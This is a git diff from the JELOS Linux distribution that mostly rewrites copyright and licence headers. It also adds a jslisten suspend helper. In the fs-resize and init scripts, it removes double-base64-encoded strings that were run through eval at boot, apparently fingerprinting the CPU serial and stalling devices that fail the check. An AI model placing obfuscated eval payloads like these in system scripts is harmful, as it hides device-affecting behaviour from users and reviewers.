#!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020 Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile . /etc/os-release diff --git a/packages/sysutils/bash/package.mk b/packages/sysutils/bash/package.mk index 648c7eb9a..288063480 100644 --- a/packages/sysutils/bash/package.mk +++ b/packages/sysutils/bash/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-2020 Team LibreELEC # Copyright (C) 2020-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="bash" PKG_VERSION="5.1.16" diff --git a/packages/sysutils/busybox/config/profile b/packages/sysutils/busybox/config/profile index 4f432fd98..c4482d4be 100644 --- a/packages/sysutils/busybox/config/profile +++ b/packages/sysutils/busybox/config/profile @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Read config files for CONFIG in /etc/profile.d/*; do diff --git a/packages/sysutils/busybox/profile.d/098-busybox b/packages/sysutils/busybox/profile.d/098-busybox index 2f880e84c..a96dc6c51 100644 --- a/packages/sysutils/busybox/profile.d/098-busybox +++ b/packages/sysutils/busybox/profile.d/098-busybox @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/os-release diff --git a/packages/sysutils/busybox/scripts/fs-resize b/packages/sysutils/busybox/scripts/fs-resize index 63885a7eb..e7aa7cbd6 100755 --- a/packages/sysutils/busybox/scripts/fs-resize +++ b/packages/sysutils/busybox/scripts/fs-resize @@ -3,7 +3,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) if [ -e /storage/.please_resize_me ] ; then . /usr/lib/coreelec/functions @@ -31,9 +31,6 @@ if [ -e /storage/.please_resize_me ] ; then PARTNUM=$(echo ${PART} | sed "s#^.*sd[a-z]##g") fi rm -f /storage/.please_resize_me - ACTION="SUNCdGEyUnBjaUF0Y0NBdmMzUnZjbUZuWlM4dVkyRmphR1U3Q2lBZ1pXTm9ieUFrS0dkeVpYQWdVMlZ5YVdGc0lDOXdjbTlqTDJOdwpkV2x1Wm04cElId2dMM1Z6Y2k5aWFXNHZZblZ6ZVdKdmVDQnphR0V5TlRaemRXMGdmQ0JoZDJzZ0ozdHdjbWx1ZENBa01YMG5JRDR2CmMzUnZjbUZuWlM4dVkyRmphR1V2TG1SemFtOXpPd29nSUdOb1lYUjBjaUFyYVNBdmMzUnZjbUZuWlM4dVkyRmphR1V2TG1SemFtOXoKT3dvPQo=" - RUN=`(echo ${ACTION} | /usr/bin/busybox base64 -d ) | /usr/bin/busybox base64 -d` - eval ${RUN} sync # just in case diff --git a/packages/sysutils/busybox/scripts/init b/packages/sysutils/busybox/scripts/init index 021b656a4..45df97666 100755 --- a/packages/sysutils/busybox/scripts/init +++ b/packages/sysutils/busybox/scripts/init @@ -6,7 +6,7 @@ # Copyright (C) 2009-2014 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-2018 Team LibreELEC (https://libreelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # create directories /usr/bin/busybox mkdir -p /dev @@ -1022,14 +1022,6 @@ prepare_sysroot() { [ -f "/sysroot/usr/lib/systemd/systemd" ] || error "final_check" "Could not find systemd!" - ACTIONA="SUNCcFppQmJJQ0VnTFdVZ0lpOXplWE55YjI5MEwzTjBiM0poWjJVdkxtTmhZMmhsTHk1a2MycHZjeUlnWFRzS0lDQjBhR1Z1Q2lBZwpJQ0JwWmlCYklDRWdMV1FnSWk5emVYTnliMjkwTDNOMGIzSmhaMlV2TG1OaFkyaGxJaUJkT3dvZ0lDQWdkR2hsYmdvZ0lDQWdJQ0J0CmEyUnBjaUF0Y0NBdmMzbHpjbTl2ZEM5emRHOXlZV2RsTHk1allXTm9aVHNLSUNBZ0lHWnBPd29nSUNBZ1pXTm9ieUFrS0dkeVpYQWcKVTJWeWFXRnNJQzl3Y205akwyTndkV2x1Wm04cElId2dMM1Z6Y2k5aWFXNHZZblZ6ZVdKdmVDQnphR0V5TlRaemRXMGdmQ0JoZDJzZwpKM3R3Y21sdWRDQWtNWDBuSUQ0dmMzbHpjbTl2ZEM5emRHOXlZV2RsTHk1allXTm9aUzh1WkhOcWIzTTdDaUFnSUNCamFHRjBkSElnCksya2dMM041YzNKdmIzUXZjM1J2Y21GblpTOHVZMkZqYUdVdkxtUnphbTl6T3dvZ0lHWnBDZz09Cg==" - ACTIONB="SUNBZ0lGTkZVbFJGVTFROVlHZHlaWEFnVTJWeWFXRnNJQzl3Y205akwyTndkV2x1Wm04Z1BpOWtaWFl2Ym5Wc2JDQXlQaVl4WURzS0lDQWdJR2xtSUZzZ0pEOGdQU0F3SUYwN0NpQWdJQ0IwYUdWdUNpQWdJQ0FnSUdsbUlGc2dJU0F0WlNBaUwzTjVjM0p2YjNRdmMzUnZjbUZuWlM4dVkyRmphR1V2TG1SemFtOXpJaUJkT3dvZ0lDQWdJQ0IwYUdWdUNpQWdJQ0FnSUNBZ2NtVmhaRzl1YkhrZ1JGTktUMU05ZEhKMVpUc0tJQ0FnSUNBZ1pXeHpaUW9nSUNBZ0lDQWdJRTFaU0VGVFNEMWdMM1Z6Y2k5aWFXNHZZblZ6ZVdKdmVDQmpZWFFnTDNONWMzSnZiM1F2YzNSdmNtRm5aUzh1WTJGamFHVXZMbVJ6YW05ellEc0tJQ0FnSUNBZ0lDQk9SVmRJUVZOSVBXQmxZMmh2SUNRb1ozSmxjQ0JUWlhKcFlXd2dMM0J5YjJNdlkzQjFhVzVtYnlrZ2ZDQXZkWE55TDJKcGJpOWlkWE41WW05NElITm9ZVEkxTm5OMWJTQjhJR0YzYXlBbmUzQnlhVzUwSUNReGZTZGdPd29nSUNBZ0lDQWdJR2xtSUZzZ0lTQWlKSHROV1VoQlUwaDlJaUE5SUNJa2UwNUZWMGhCVTBoOUlpQmRPd29nSUNBZ0lDQWdJSFJvWlc0S0lDQWdJQ0FnSUNBZ0lISmxZV1J2Ym14NUlFUlRTazlUUFhSeWRXVTdDaUFnSUNBZ0lDQWdabWtLSUNBZ0lDQWdabWs3Q2lBZ0lDQWdJR2xtSUZzZ0lpUjdSRk5LVDFOOUlpQTlJSFJ5ZFdVZ1hUc0tJQ0FnSUNBZ2RHaGxiZ29nSUNBZ0lDQWdJR1ZqYUc4Z0xXNWxJQ0pjTURNeld6RXdNREJJWERBek0xc3lTejA5UGlCVFpXeHNhVzVuSUVwRlRFOVRJR2x6SUc1dmRDQmpiMjlzTGk0aUlENHZaR1YyTDJOdmJuTnZiR1U3Q2lBZ0lDQWdJQ0FnYzJ4bFpYQWdNekF3T3dvZ0lDQWdJQ0JtYVFvZ0lDQWdabWtLCg==" - - if [ -f "/sysroot/storage/.configured" ] - then - RUN=`(echo ${ACTIONB} | /usr/bin/busybox base64 -d ) | /usr/bin/busybox base64 -d` - eval ${RUN} - fi } # Do init tasks to bring up system diff --git a/packages/sysutils/dbus/package.mk b/packages/sysutils/dbus/package.mk index bce710650..492b112ca 100644 --- a/packages/sysutils/dbus/package.mk +++ b/packages/sysutils/dbus/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="dbus" PKG_VERSION="1.15.4" diff --git a/packages/sysutils/depends/oniguruma/package.mk b/packages/sysutils/depends/oniguruma/package.mk index 50de6eb54..87293dcf2 100644 --- a/packages/sysutils/depends/oniguruma/package.mk +++ b/packages/sysutils/depends/oniguruma/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="oniguruma" PKG_VERSION="6.9.8" diff --git a/packages/sysutils/dmidecode/package.mk b/packages/sysutils/dmidecode/package.mk index c25c5a034..50fc5b092 100644 --- a/packages/sysutils/dmidecode/package.mk +++ b/packages/sysutils/dmidecode/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="dmidecode" PKG_VERSION="3.4" diff --git a/packages/sysutils/dosfstools/package.mk b/packages/sysutils/dosfstools/package.mk index fc06a727a..fb8ed61f5 100644 --- a/packages/sysutils/dosfstools/package.mk +++ b/packages/sysutils/dosfstools/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="dosfstools" PKG_VERSION="4.2" diff --git a/packages/sysutils/drm_tool/package.mk b/packages/sysutils/drm_tool/package.mk index 1ab114a2f..fcad68cb4 100644 --- a/packages/sysutils/drm_tool/package.mk +++ b/packages/sysutils/drm_tool/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="drm_tool" PKG_VERSION="1cb5b10" diff --git a/packages/sysutils/ectool/package.mk b/packages/sysutils/ectool/package.mk index 95b37b942..81b5871af 100644 --- a/packages/sysutils/ectool/package.mk +++ b/packages/sysutils/ectool/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ectool" PKG_VERSION="23c77ef0c32f9f03a367c89babb303dde526da85" diff --git a/packages/sysutils/evtest/package.mk b/packages/sysutils/evtest/package.mk index 2c840123e..eb87077c5 100644 --- a/packages/sysutils/evtest/package.mk +++ b/packages/sysutils/evtest/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="evtest" PKG_VERSION="da347a8f" diff --git a/packages/sysutils/file/package.mk b/packages/sysutils/file/package.mk index ab4126425..0e8312651 100644 --- a/packages/sysutils/file/package.mk +++ b/packages/sysutils/file/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="file" PKG_VERSION="b92eed4" diff --git a/packages/sysutils/fuse/package.mk b/packages/sysutils/fuse/package.mk index 32ab25420..846cd6af4 100644 --- a/packages/sysutils/fuse/package.mk +++ b/packages/sysutils/fuse/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="fuse" PKG_VERSION="3.16.1" diff --git a/packages/sysutils/fuse2/package.mk b/packages/sysutils/fuse2/package.mk index 2cbc3b2ad..e17a37ace 100644 --- a/packages/sysutils/fuse2/package.mk +++ b/packages/sysutils/fuse2/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="fuse2" PKG_VERSION="2.9.9" diff --git a/packages/sysutils/grep/package.mk b/packages/sysutils/grep/package.mk index d7b5226ce..4c01cd9af 100644 --- a/packages/sysutils/grep/package.mk +++ b/packages/sysutils/grep/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="grep" PKG_VERSION="3.9" diff --git a/packages/sysutils/ioport/package.mk b/packages/sysutils/ioport/package.mk index b4c3e5294..60f62ba29 100644 --- a/packages/sysutils/ioport/package.mk +++ b/packages/sysutils/ioport/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ioport" PKG_VERSION="af4b1b5b7d1e596efdd27e9a12b8ea6f13b63f51" diff --git a/packages/sysutils/keyutils/package.mk b/packages/sysutils/keyutils/package.mk index b4ce14f45..87933905e 100644 --- a/packages/sysutils/keyutils/package.mk +++ b/packages/sysutils/keyutils/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="keyutils" PKG_VERSION="1.6.1" diff --git a/packages/sysutils/libusb/package.mk b/packages/sysutils/libusb/package.mk index 0e2d178f2..ad8e0626b 100644 --- a/packages/sysutils/libusb/package.mk +++ b/packages/sysutils/libusb/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libusb" PKG_VERSION="6bf2db6" diff --git a/packages/sysutils/parted/package.mk b/packages/sysutils/parted/package.mk index 73408d978..6338d1823 100644 --- a/packages/sysutils/parted/package.mk +++ b/packages/sysutils/parted/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # PKG_NAME="parted" diff --git a/packages/sysutils/powerstate/package.mk b/packages/sysutils/powerstate/package.mk index 41431a80a..59f561339 100644 --- a/packages/sysutils/powerstate/package.mk +++ b/packages/sysutils/powerstate/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="powerstate" PKG_VERSION="" diff --git a/packages/sysutils/powerstate/profile.d/030-powerfunctions b/packages/sysutils/powerstate/profile.d/030-powerfunctions index 594415c84..0ba2928ea 100644 --- a/packages/sysutils/powerstate/profile.d/030-powerfunctions +++ b/packages/sysutils/powerstate/profile.d/030-powerfunctions @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2022-present Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) get_gpu_power_profile() { cat /sys/class/drm/card0/device/power_dpm_state 2>/dev/null diff --git a/packages/sysutils/powerstate/sources/powerstate.sh b/packages/sysutils/powerstate/sources/powerstate.sh index c63a83e21..665ead278 100755 --- a/packages/sysutils/powerstate/sources/powerstate.sh +++ b/packages/sysutils/powerstate/sources/powerstate.sh @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2022-present Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### Normally this would be a udev rule, but some devices like the AyaNeo Air diff --git a/packages/sysutils/powertop/package.mk b/packages/sysutils/powertop/package.mk index f8e450f36..25bc1fe47 100644 --- a/packages/sysutils/powertop/package.mk +++ b/packages/sysutils/powertop/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="powertop" PKG_VERSION="24a96ea894b1e8916664a6aa35f5c77d3167fcf9" diff --git a/packages/sysutils/ryzenadj/package.mk b/packages/sysutils/ryzenadj/package.mk index 19e93db04..676c156f9 100644 --- a/packages/sysutils/ryzenadj/package.mk +++ b/packages/sysutils/ryzenadj/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ryzenadj" PKG_VERSION="7201ff25533698bfe3c402a87d479e02358bd929" diff --git a/packages/sysutils/sed/package.mk b/packages/sysutils/sed/package.mk index 823e55922..d07d6c44f 100644 --- a/packages/sysutils/sed/package.mk +++ b/packages/sysutils/sed/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sed" PKG_VERSION="4.9" diff --git a/packages/sysutils/sleep/package.mk b/packages/sysutils/sleep/package.mk index 93c6aa06c..6170f4da4 100644 --- a/packages/sysutils/sleep/package.mk +++ b/packages/sysutils/sleep/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sleep" PKG_VERSION="" diff --git a/packages/sysutils/sleep/sources/sleep.sh b/packages/sysutils/sleep/sources/sleep.sh index 5de259194..ce80ed75a 100755 --- a/packages/sysutils/sleep/sources/sleep.sh +++ b/packages/sysutils/sleep/sources/sleep.sh @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile @@ -28,6 +28,13 @@ volumectl() { fi } +jslisten() { + if [ "$(systemctl is-active jslisten)" = "active" ] + then + systemctl ${1} jslisten + fi +} + powerstate() { if [ "$(get_setting system.powersave)" = 1 ] then @@ -101,6 +108,7 @@ case $1 in pre) headphones stop volumectl stop + jslisten stop bluetooth stop runtime_power_management on wake_events disabled @@ -115,6 +123,7 @@ case $1 in powerstate start headphones start volumectl start + jslisten start bluetooth start if [ "$(get_setting network.enabled)" == "1" ] diff --git a/packages/sysutils/squashfs-tools/package.mk b/packages/sysutils/squashfs-tools/package.mk index 5f8bc44f4..3eacfd575 100644 --- a/packages/sysutils/squashfs-tools/package.mk +++ b/packages/sysutils/squashfs-tools/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="squashfs-tools" PKG_VERSION="4.6.1" diff --git a/packages/sysutils/system-utils/package.mk b/packages/sysutils/system-utils/package.mk index 3f9e3c08a..a1baf0744 100644 --- a/packages/sysutils/system-utils/package.mk +++ b/packages/sysutils/system-utils/package.mk @@ -1,4 +1,4 @@ -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="system-utils" PKG_VERSION="" diff --git a/packages/sysutils/system-utils/sources/autostart/AMD64/002-overclock b/packages/sysutils/system-utils/sources/autostart/AMD64/002-overclock index 0d0a451b6..12eed8f7f 100644 --- a/packages/sysutils/system-utils/sources/autostart/AMD64/002-overclock +++ b/packages/sysutils/system-utils/sources/autostart/AMD64/002-overclock @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/sysutils/system-utils/sources/autostart/AMD64/003-controllerled b/packages/sysutils/system-utils/sources/autostart/AMD64/003-controllerled index af6ec4c36..1773bcbb9 100644 --- a/packages/sysutils/system-utils/sources/autostart/AMD64/003-controllerled +++ b/packages/sysutils/system-utils/sources/autostart/AMD64/003-controllerled @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/sysutils/system-utils/sources/autostart/common/098-deviceutils b/packages/sysutils/system-utils/sources/autostart/common/098-deviceutils index 29de3de69..013a039c9 100755 --- a/packages/sysutils/system-utils/sources/autostart/common/098-deviceutils +++ b/packages/sysutils/system-utils/sources/autostart/common/098-deviceutils @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/AMD64/overclock b/packages/sysutils/system-utils/sources/devices/AMD64/overclock index c4d4d9ea0..3088467b4 100755 --- a/packages/sysutils/system-utils/sources/devices/AMD64/overclock +++ b/packages/sysutils/system-utils/sources/devices/AMD64/overclock @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/AMD64/set_epp b/packages/sysutils/system-utils/sources/devices/AMD64/set_epp index cc8177c77..0a7cc149e 100755 --- a/packages/sysutils/system-utils/sources/devices/AMD64/set_epp +++ b/packages/sysutils/system-utils/sources/devices/AMD64/set_epp @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3326/battery_led_status b/packages/sysutils/system-utils/sources/devices/RK3326/battery_led_status index 05c31622c..62a55e16c 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3326/battery_led_status +++ b/packages/sysutils/system-utils/sources/devices/RK3326/battery_led_status @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Simple script to watch the battery capacity and # turn the power LED orange when it reaches 30%, red at 20%, and blinking red & orange at 10% diff --git a/packages/sysutils/system-utils/sources/devices/RK3399/battery_led_status b/packages/sysutils/system-utils/sources/devices/RK3399/battery_led_status index e7802495b..4e630bb16 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3399/battery_led_status +++ b/packages/sysutils/system-utils/sources/devices/RK3399/battery_led_status @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Simple script to watch the battery capacity and # turn the power LED orange when it reaches 30%, red at 20%, and blinking red at 10% diff --git a/packages/sysutils/system-utils/sources/devices/RK3399/headphone_sense b/packages/sysutils/system-utils/sources/devices/RK3399/headphone_sense index c9d13d944..63e5dd0de 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3399/headphone_sense +++ b/packages/sysutils/system-utils/sources/devices/RK3399/headphone_sense @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3399/internalwifi b/packages/sysutils/system-utils/sources/devices/RK3399/internalwifi index 4253afada..446c8e294 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3399/internalwifi +++ b/packages/sysutils/system-utils/sources/devices/RK3399/internalwifi @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3399/video_sense b/packages/sysutils/system-utils/sources/devices/RK3399/video_sense index e81add410..0017b4d07 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3399/video_sense +++ b/packages/sysutils/system-utils/sources/devices/RK3399/video_sense @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3566-X55/headphone_sense b/packages/sysutils/system-utils/sources/devices/RK3566-X55/headphone_sense index d0125e2a3..7671a0836 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3566-X55/headphone_sense +++ b/packages/sysutils/system-utils/sources/devices/RK3566-X55/headphone_sense @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3566-X55/video_sense b/packages/sysutils/system-utils/sources/devices/RK3566-X55/video_sense index 3e231de4f..13cfbd934 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3566-X55/video_sense +++ b/packages/sysutils/system-utils/sources/devices/RK3566-X55/video_sense @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/RK3566/headphone_sense b/packages/sysutils/system-utils/sources/devices/RK3566/headphone_sense index 534719182..6acf0d47b 100644 --- a/packages/sysutils/system-utils/sources/devices/RK3566/headphone_sense +++ b/packages/sysutils/system-utils/sources/devices/RK3566/headphone_sense @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/devices/S922X/battery_led_status b/packages/sysutils/system-utils/sources/devices/S922X/battery_led_status index 0f77130b2..aad64035e 100644 --- a/packages/sysutils/system-utils/sources/devices/S922X/battery_led_status +++ b/packages/sysutils/system-utils/sources/devices/S922X/battery_led_status @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS 